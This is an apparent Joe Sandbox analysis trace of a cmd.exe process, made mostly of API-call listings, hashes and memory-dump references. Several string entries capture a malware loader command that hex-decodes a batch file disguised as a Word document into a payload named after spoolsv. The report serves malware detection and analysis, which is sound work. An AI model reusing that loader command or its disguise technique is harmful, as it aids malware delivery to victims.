                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1623332820-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1826527819-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1464828906-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcschr
                                                                                                          • String ID: 2$COMSPEC
                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction ID: 871d66ac56159339634f83c76faac090e6017405a0ab398c94d5d4044214133e
                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction Fuzzy Hash: 9751A122A0A643C5FB67BB2DF49137AE2919F44B8CF864031DA4D426F5DE2DE8448761
                                                                                                          APIs
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4254246844-0
                                                                                                          • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                          • Instruction ID: 291bbef25b171a2b2314424986f407d6e6549684f87f32eee2636b889729811f
                                                                                                          • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                                                                                          • Instruction Fuzzy Hash: 3E419621A0A74286EE96AB08F444379F790FF49788F865531D95D477B0FF3CE4498760
                                                                                                          APIs
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591002910-0
                                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction ID: 605d5d8ec0567993b985d8a43f9688b2f13509dd5c5ea4feab659799e5701994
                                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                          • Instruction Fuzzy Hash: DAF06734A4B602CBE706AB18F895179BBA0FB8D719B865235C90A43334DE3DA4158B11
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DriveType
                                                                                                          • String ID: :
                                                                                                          • API String ID: 338552980-336475711
                                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction ID: 28bf559c3646b83636a164d3a6a04605856f8dc573197f1e0a7878da6b68c91a
                                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                          • Instruction Fuzzy Hash: 81E0E56661860087D7209B58F09106AF760FB8C308FC51624D98D83734DB3CC249CB18
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF7AB135B52
                                                                                                            • Part of subcall function 00007FF7AB134224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134297
                                                                                                            • Part of subcall function 00007FF7AB134224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1342D7
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB1342FD
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB134368
                                                                                                            • Part of subcall function 00007FF7AB134224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134380
                                                                                                            • Part of subcall function 00007FF7AB134224: wcsrchr.MSVCRT ref: 00007FF7AB1343E6
                                                                                                            • Part of subcall function 00007FF7AB134224: lstrcmpW.KERNELBASE ref: 00007FF7AB134401
                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7AB135BC7
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 497088868-0
                                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction ID: 93e1d054896898dcc63ab178fdf82fb0f1fe47c4e10f67c43ae1a2d17e8469d0
                                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                          • Instruction Fuzzy Hash: B631B630A0E64286FA69B719F49417DE295FF89B8CF865031D94E47BB5EF3CE4058710
                                                                                                          APIs
                                                                                                          • FindClose.KERNELBASE(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseFind
                                                                                                          • String ID:
                                                                                                          • API String ID: 1863332320-0
                                                                                                          • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                          • Instruction ID: da46d8b68aa3bde4d592886268386e888e2df2e60116a37c2a8baacc06d6b703
                                                                                                          • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                                                                          • Instruction Fuzzy Hash: A101D630E0A643C5E69AA71DF450039F6A1FF88B48BD6A530D50EC32B4EF2CE5868324
                                                                                                          APIs
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1412018758-0
                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction ID: 07e695a87ec2638c0a7469e996b99b8eb7c6cb83922186750ba6f307d45bdb64
                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                          • Instruction Fuzzy Hash: 6FE06541F1B24B81FE5E376AF881178A2505F18789FC91430CD0E053B2FD2CA1998330
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction ID: c1882c4700a1322671b282f50fe12c5dde7c16e2fbdf4df465b8c7255d198c96
                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                          • Instruction Fuzzy Hash: D5F03131A1A742C6EB56AB19F840078FBA5FB89B48B9A9534D90E03374DF3CD446C720
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: exit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2483651598-0
                                                                                                          Similarity
                                                                                                          • API ID: DefaultUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358694519-0
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                          • String ID: COPYCMD$\
                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                          Similarity
                                                                                                          • API ID: CloseValue$CreateDeleteOpen
                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                          • API String ID: 4081037667-3301834661
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmpwcsrchr
                                                                                                          • String ID: COPYCMD
                                                                                                          • API String ID: 2429825313-3727491224
                                                                                                          Similarity
                                                                                                          • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3476366620-0
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction ID: b6c74b2d07e88b0715cad910373ad56d90adff6bfe7daaebf43208927358bc43
                                                                                                          • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                          • Instruction Fuzzy Hash: 72A1E521A1A646C5EB56BB1DF45167AA6A1FF88788FC24135DD4E837B4EF3CE401C320
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF7AB12F52A,00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F8DE
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F8FB
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F951
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F96B
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FA8E
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12FB14
                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FB2D
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12FBEA
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB12F996
                                                                                                            • Part of subcall function 00007FF7AB130010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7AB14849D,?,?,?,00007FF7AB14F0C7), ref: 00007FF7AB130045
                                                                                                            • Part of subcall function 00007FF7AB130010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7AB14F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB130071
                                                                                                            • Part of subcall function 00007FF7AB130010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB130092
                                                                                                            • Part of subcall function 00007FF7AB130010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB1300A7
                                                                                                            • Part of subcall function 00007FF7AB130010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB130181
                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D401
                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D41B
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D435
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13D480
                                                                                                          Strings
                                                                                                          • =,;, xrefs: 00007FF7AB12F8C8
                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF7AB12F90E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                                          • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 3964947564-2064621987
                                                                                                          • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction ID: 01f0b7dc2bddbf7a9127ce499b9c4e6f806935b85e3d70ea7b135fd0036b164c
                                                                                                          • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                                          • Instruction Fuzzy Hash: 66026A21A0B602C6EB5ABB29F854278E7A0FF4975CFD24635D90E432B4EF3DA414C661
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                          • API String ID: 198002717-267741548
                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction ID: 0c8f972cece2aa3c170077d63e7f45d57bc5834901acecf6befa7d7d5e343c88
                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction Fuzzy Hash: 1A514F21A0A64286F6556B1DF854279FA90BF49B88FD69175C94E03678EF3CE0488360
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction ID: 1870dbb0b25e24ca83d9c094d5b22b03a32a59e301fa8cb2419b7669c19a9978
                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction Fuzzy Hash: DB22A665E0A656C1FA667B1DF45027AE7A0BF05B9CFC24232D98D422F4DF3CA4418BB1
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                          • API String ID: 0-1899266523
                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction ID: b64bd52a78cd404e0ba2859732af14aeaa9009bac675468b1eac89fd778c7f9a
                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction Fuzzy Hash: 45517120A0E64381FB9A7F2DF4402B8B690AF4574CFD68135C65E462B4EF3CA44C87B0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                          • String ID: 0123456789$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 1606811317-3850188605
                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction ID: 0b012d0c77d824589ceca6df754b02bcd46a2b1501e2e1f0570f6ddfc5952729
                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction Fuzzy Hash: 59D1BF21A0AA4682EB56AB1CF8142B9A7A0FF45B9CFC64231DE5D437B4DF3CE415C760
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D884
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D89D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D94D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D964
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB12DB89
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DBDF
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DC63
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DD33
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DE9A
                                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12DF1F
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1051989028-0
                                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction ID: 8ba498fae1b2371dcddc441a8f9e9a99b3acfe04663ae6fb0efa6d630bfb9925
                                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction Fuzzy Hash: EC028136A0AB45C2EA26AF18F440279B6A1FB45B98F964635DA8D037F4DF3CD461C720
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1944892715-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1254DE
                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12552B
                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12554F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14345F
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB14347E
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434C3
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1434DB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434FA
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
